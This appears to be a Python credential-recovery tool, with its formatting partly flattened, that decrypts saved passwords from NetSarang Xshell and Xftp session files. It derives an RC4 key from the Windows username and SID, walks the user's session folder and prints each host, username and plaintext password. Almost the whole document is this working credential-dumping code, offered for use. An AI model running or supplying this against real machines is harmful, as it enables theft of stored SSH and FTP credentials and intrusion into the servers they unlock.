cannot be used independently from the original environment

[fakeultrali]

import os import sys import argparse import base64 import configparser

from win32api import GetComputerName, GetUserName from win32security import LookupAccountName, ConvertSidToStringSid from Crypto.Hash import SHA256 from Crypto.Cipher import ARC4

def decrypt_string(a1, a2): v1 = base64.b64decode(a2) v3 = ARC4.new(SHA256.new(a1.encode('ascii')).digest()).decrypt(v1[:len(v1) - 0x20]) if SHA256.new(v3).digest() == v1[-32:]: return v3.decode('ascii') else: return None

VERSION_6_CONFIG_PATH = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang Computer\6") VERSION_7_CONFIG_PATH = os.path.join(os.environ["USERPROFILE"], r"Documents\NetSarang Computer\7")

config_path = "" parser = argparse.ArgumentParser(description="xsh, xfp password decrypt") parser.add_argument("-v", "--version", default="7", help="Xshell version, eg. 6 or 7") parser.add_argument("-s", "--sid", default="", type=str, help="sid, get by whoami /user in command.") parser.add_argument("-u", "--user", default="", type=str, help="username, get by whoami /user in command.") parser.add_argument("-p", "--password", default="", type=str, help="the password in sessions or path of sessions") args = parser.parse_args()

if not args.password: if os.path.exists(VERSION_6_CONFIG_PATH): config_path = VERSION_6_CONFIG_PATH elif os.path.exists(VERSION_7_CONFIG_PATH): config_path = VERSION_7_CONFIG_PATH else: print("Error: can't found valid session path") sys.exit(0) args.password = config_path

if not args.sid: # method from https://github.com/JDArmy/SharpXDecrypt if config_path == VERSION_7_CONFIG_PATH: tmp = GetUserName()[::-1] + ConvertSidToStringSid(LookupAccountName(GetComputerName(), GetUserName())[0]) args.token = tmp[::-1] else: args.token = GetUserName() + ConvertSidToStringSid(LookupAccountName(GetComputerName(), GetUserName())[0]) else: if args.version == '7': args.token = (args.user[::-1] + args.sid)[::-1] else: args.token = args.user + args.sid

if not os.path.isdir(args.password): r = decrypt_string(args.token, args.password) if r: print(r)

for root, dirs, files in os.walk(args.password): for f in files: if f.endswith(".xsh") or f.endswith(".xfp"): filepath = os.path.join(root, f) cfg = configparser.ConfigParser() try: cfg.read(filepath) except UnicodeDecodeError: cfg.read(filepath, encoding="utf-16")

        try:
            if f.endswith(".xsh"):
                host = "{}:{}".format(cfg["CONNECTION"]["Host"], cfg["CONNECTION"]["Port"])
                username = cfg["CONNECTION:AUTHENTICATION"]["UserName"]
                password = decrypt_string(args.token, cfg["CONNECTION:AUTHENTICATION"]["Password"])
            else:
                host = "{}:{}".format(cfg["Connection"]["Host"], cfg["Connection"]["Port"])
                username = cfg["Connection"]["UserName"]
                password = decrypt_string(args.token, cfg["Connection"]["Password"])
            print(
                f"{filepath:=^100}\nHost:     {host}\nUsername: {username}\nPassword: {password}")
        except Exception as e:
            print(f"{filepath:=^100}\nError:{e}")